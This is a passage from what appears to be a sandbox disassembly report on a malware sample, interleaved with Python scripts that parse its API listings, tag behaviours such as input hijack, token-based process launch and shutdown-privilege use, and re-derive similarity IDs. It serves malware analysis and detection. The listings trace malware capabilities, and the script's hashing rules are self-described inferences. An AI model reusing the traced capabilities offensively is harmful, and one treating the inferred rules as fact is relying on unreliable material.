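                }
                KEY_APIS = {"GetKeyState", "MapVirtualKeyW", "keybd_event"}


                def decode_constants(calls: List[ApiCall]) -> List[Tuple[str, str]]:
                    """(api, symbolic constant) for key-code APIs (first argument) and for
                    SHGetFolderPathW (second argument, the CSIDL). Unknown values pass through."""
                    out = []
                    for c in calls:
                        if c.api == "SHGetFolderPathW" and len(c.args) > 1:
                            out.append((c.api, CSIDL.get(_const(c.args[1]), c.args[1])))
                        elif c.api in KEY_APIS and c.args:
                            out.append((c.api, VK.get(_const(c.args[0]), c.args[0])))
                    return out


                # Hypothetical signatures (names chosen for this example): every API in the
                # set must appear in the same function, ignoring "Part of subcall" bullets.
                BEHAVIOURS = {
                    "foreground/input hijack":
                        {"AttachThreadInput", "SetForegroundWindow", "keybd_event"},
                    "process launch under another user token":
                        {"DuplicateTokenEx", "LoadUserProfileW", "CreateProcessAsUserW"},
                    "shutdown privilege acquisition":
                        {"LookupPrivilegeValueW", "AdjustTokenPrivileges", "ExitWindowsEx"},
                }


                def tag_behaviours(calls: List[ApiCall]) -> List[str]:
                    """Sorted labels whose whole API set occurs in this function's own calls."""
                    present = {c.api for c in calls if not c.subcall}
                    return sorted(label for label, apis in BEHAVIOURS.items() if apis <= present)


                # Sample input: bullets excerpted from the listings on this page.
                FOCUS_STEAL = """
                • GetForegroundWindow.USER32 ref: 00434420
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                • GetCurrentThreadId.KERNEL32 ref: 00434485
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                """
                RUN_AS = """
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                """
                FOLDERS = """
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                """

                if __name__ == "__main__":
                    for name, block in (("focus", FOCUS_STEAL), ("runas", RUN_AS), ("folders", FOLDERS)):
                        calls = parse_api_lines(block)
                        print(name, len(calls), tag_behaviours(calls), decode_constants(calls))
                ```

                Run it on a whole report saved as text and `parse_api_lines` will happily swallow every function's bullets at once; to keep per-function attribution, split the text on the `APIs` heading first and feed each chunk separately, otherwise a signature can be satisfied by APIs that never occur in the same function.
                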
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                • FindClose.KERNEL32(00000000), ref: 0044291C
                • FindClose.KERNEL32(00000000), ref: 00442930
                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                • FindClose.KERNEL32(00000000), ref: 004429D4
                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                • FindClose.KERNEL32(00000000), ref: 004429E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                • GetLastError.KERNEL32 ref: 00433414
                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 2938487562-3733053543
                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                APIs
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                • GetLengthSid.ADVAPI32(?), ref: 00446241
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                • CopySid.ADVAPI32(00000000), ref: 00446271
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 1255039815-0
                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                APIs
                • __swprintf.LIBCMT ref: 00433073
                • __swprintf.LIBCMT ref: 00433085
                • __wcsicoll.LIBCMT ref: 00433092
                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                • LockResource.KERNEL32(00000000), ref: 004330CA
                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                • LockResource.KERNEL32(?), ref: 00433120
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                • String ID:
                • API String ID: 1158019794-0
                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                • GetLastError.KERNEL32 ref: 0045D6BF
                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Error$Mode$DiskFreeLastSpace
                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                • API String ID: 4194297153-14809454
                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_strncmp
                • String ID: @oH$\$^$h
                • API String ID: 2175499884-3701065813
                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                APIs
                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                • listen.WSOCK32(00000000,00000005), ref: 00465381
                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                • Note: socket(2,1,6) is socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); followed by bind on a 16-byte sockaddr_in and listen with backlog 5, this routine opens a TCP listening socket, i.e. the binary carries inbound (server-side) networking code, so an infected host is worth checking for unexpected listening ports.
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast$closesocket$bindlistensocket
                • String ID:
                • API String ID: 540024437-0
                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                • API String ID: 0-2872873767
                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                • __wsplitpath.LIBCMT ref: 00475644
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscat.LIBCMT ref: 00475657
                • __wcsicoll.LIBCMT ref: 0047567B
                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                • String ID:
                • API String ID: 2547909840-0
                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
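The "API ID" in each Similarity block is derived from the function's API listing, which is what lets a routine from this sample be matched against the same routine in other reports. The script below is an added example written for this page, not Joe Sandbox's own code: it parses "APIs" lines exactly as they are printed above and rebuilds the API ID. The rules it applies (strip the module, split Win32 names on CamelCase, keep CRT and Winsock names whole, drop tokens shorter than four characters, order tokens by frequency and then alphabetically, join frequency groups with "$") are inferred from the listings in this report and are an assumption; the numeric "API String ID" is a hash whose scheme the report does not expose, so it is not reproduced. The three embedded listings are copied from the directory-walk, DACL-edit and process-enumeration entries above.

```python
"""Re-derive a Joe Sandbox-style "API ID" from a function's "APIs" listing.

Added example for this report. The grouping rules are inferred from the
Similarity blocks on this page (an assumption), not taken from Joe Sandbox.
"""
import re
from collections import Counter
from itertools import groupby

# One "APIs" line: optional bullet, optional "Part of subcall function X:"
# prefix, then Name.MODULE followed by arguments and/or "ref: ...".
_API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
)
# CamelCase token: one capital followed by lower-case letters/digits,
# so "Process32FirstW" -> ["Process32", "First", "W"].
_CAMEL = re.compile(r"[A-Z][a-z0-9]*")
# Assumption inferred from this page: tokens shorter than 4 characters
# (Get, Set, Is, Ex, W, WSA, Sid, Ace, Acl, Add) never reach the API ID.
MIN_TOKEN_LEN = 4


def parse_api_names(listing: str) -> list[str]:
    """Return API names (module stripped) from the report's 'APIs' lines."""
    names = []
    for line in listing.splitlines():
        m = _API_LINE.match(line)
        if m:
            names.append(m.group("name"))
    return names


def tokens_for(name: str) -> list[str]:
    """Split a Win32 CamelCase name into tokens; keep CRT/Winsock names whole."""
    parts = _CAMEL.findall(name) if name[0].isupper() else [name]
    return [p for p in parts if len(p) >= MIN_TOKEN_LEN]


def api_id(names: list[str]) -> str:
    """Group tokens by frequency (descending), alphabetical inside a group;
    a group is joined with '' and groups are joined with '$'."""
    counts = Counter(tok for name in names for tok in tokens_for(name))
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return "$".join(
        "".join(tok for tok, _n in grp)
        for _count, grp in groupby(ordered, key=lambda kv: kv[1])
    )


# Listings copied from this report (directory walk, DACL edit, process enum).
FIND_LISTING = """\
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
"""
SECURITY_LISTING = """\
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
• GetLengthSid.ADVAPI32(?), ref: 004461D0
• GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• GetLengthSid.ADVAPI32(?), ref: 00446241
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
• CopySid.ADVAPI32(00000000), ref: 00446271
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
"""
PROCESS32_LISTING = """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
• __wsplitpath.LIBCMT ref: 00475644
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00475657
• __wcsicoll.LIBCMT ref: 0047567B
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
"""

if __name__ == "__main__":
    for label, listing in (("find", FIND_LISTING), ("dacl", SECURITY_LISTING),
                           ("process32", PROCESS32_LISTING)):
        names = parse_api_names(listing)
        print(f"{label}: {len(names)} APIs -> {api_id(names)}")
```

Run as-is it prints the three API IDs shown in the corresponding Similarity blocks; pasting the "APIs" lines of a function from another report into the same parser gives a value that can be compared directly with the ones on this page.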
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                • Sleep.KERNEL32(0000000A), ref: 0045250B
                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                • FindClose.KERNEL32(?), ref: 004525FF
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                • String ID: *.*$\VH
                • API String ID: 2786137511-2657498754
                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
